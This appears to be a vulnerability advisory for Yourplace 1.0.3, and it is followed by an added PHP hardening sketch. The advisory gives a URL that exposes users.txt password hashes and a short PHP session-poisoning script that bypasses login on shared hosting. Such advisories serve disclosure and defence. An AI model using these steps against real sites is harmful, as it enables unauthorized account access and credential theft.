Yourplace 1.0.3 Credentials Disclosure and Session Poisoning Vulnerabilities

2012.07.24
Credit: condis
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-200

Yourplace 1.0.3 Credentials Disclosure && Session Poisoning Vulnerabilities
by condis
04.10.2011
download : http://sourceforge.net/projects/yourplace/

1. Credentials Disclosure Vulnerability

Proof of Concept:
http://host.tld/user/info/users.txt

You'll see something like:
admin $1$DG3.QA2.$6WzBBJvwvtqzUBxZcD.dC1

Description:
There is no .htaccess rule which could deny access to users.txt. Also it's pure stupidness to put sensitive data into txt files... The user password is encrypted using the crypt() function, where password is the user-defined password and salt is his login.

2. Session Poisoning Vulnerability

To exploit this vulnerability you must have an account on the server hosting the attacked application, i.e. in another domain (shared hosting).

1. Visit the site you want to attack.
2. Create a simple script:

    <?php
    session_start();
    $_SESSION['username'] = true;
    ?>

   Save it on your account and execute it via the browser.
3. Refresh the browser tab with the attacked site.
4. You're logged in ... nice and easy, lulz...
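A hardening sketch for the session poisoning issue above, added here as an example and not taken from Yourplace's code: it keeps session files in a directory private to the account and accepts a login only when the session carries an HMAC tag that the application itself wrote. The paths, the session name and the function names are hypothetical, and it assumes each hosting account runs PHP under its own system user, so other accounts can neither write to the session directory nor read the key file.

```php
<?php
declare(strict_types=1);
// Added example, not Yourplace code. All paths and names are hypothetical.
const SESSION_DIR  = '/home/example/private/sessions';    // outside the web root, mode 0700
const SESSION_KEY  = '/home/example/private/session.key'; // 32+ random bytes, mode 0600
const SESSION_NAME = 'YPSESSID';

function start_app_session(): void
{
    // Do not share the host-wide session directory with other accounts.
    if (!is_dir(SESSION_DIR) && !mkdir(SESSION_DIR, 0700, true)) {
        throw new RuntimeException('cannot create private session directory');
    }
    session_save_path(SESSION_DIR);
    session_name(SESSION_NAME);
    session_start([
        'use_strict_mode'  => 1, // reject session ids that have no server-side session yet
        'use_only_cookies' => 1,
        'cookie_httponly'  => 1,
    ]);
}

function session_tag(string $username): string
{
    $key = @file_get_contents(SESSION_KEY);
    if ($key === false || strlen($key) < 32) {
        throw new RuntimeException('session key missing or too short');
    }
    return hash_hmac('sha256', $username, $key);
}

// Call only after the password has been verified.
function mark_logged_in(string $username): void
{
    session_regenerate_id(true); // new id on privilege change
    $_SESSION['username'] = $username;
    $_SESSION['tag']      = session_tag($username);
}

// Returns the user name, or null when the session was not written by mark_logged_in().
function current_user(): ?string
{
    $user = $_SESSION['username'] ?? null;
    $tag  = $_SESSION['tag'] ?? null;
    if (!is_string($user) || !is_string($tag)) {
        return null; // e.g. $_SESSION['username'] = true, as in the script above
    }
    return hash_equals(session_tag($user), $tag) ? $user : null;
}
```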

References:

http://sourceforge.net/projects/yourplace/

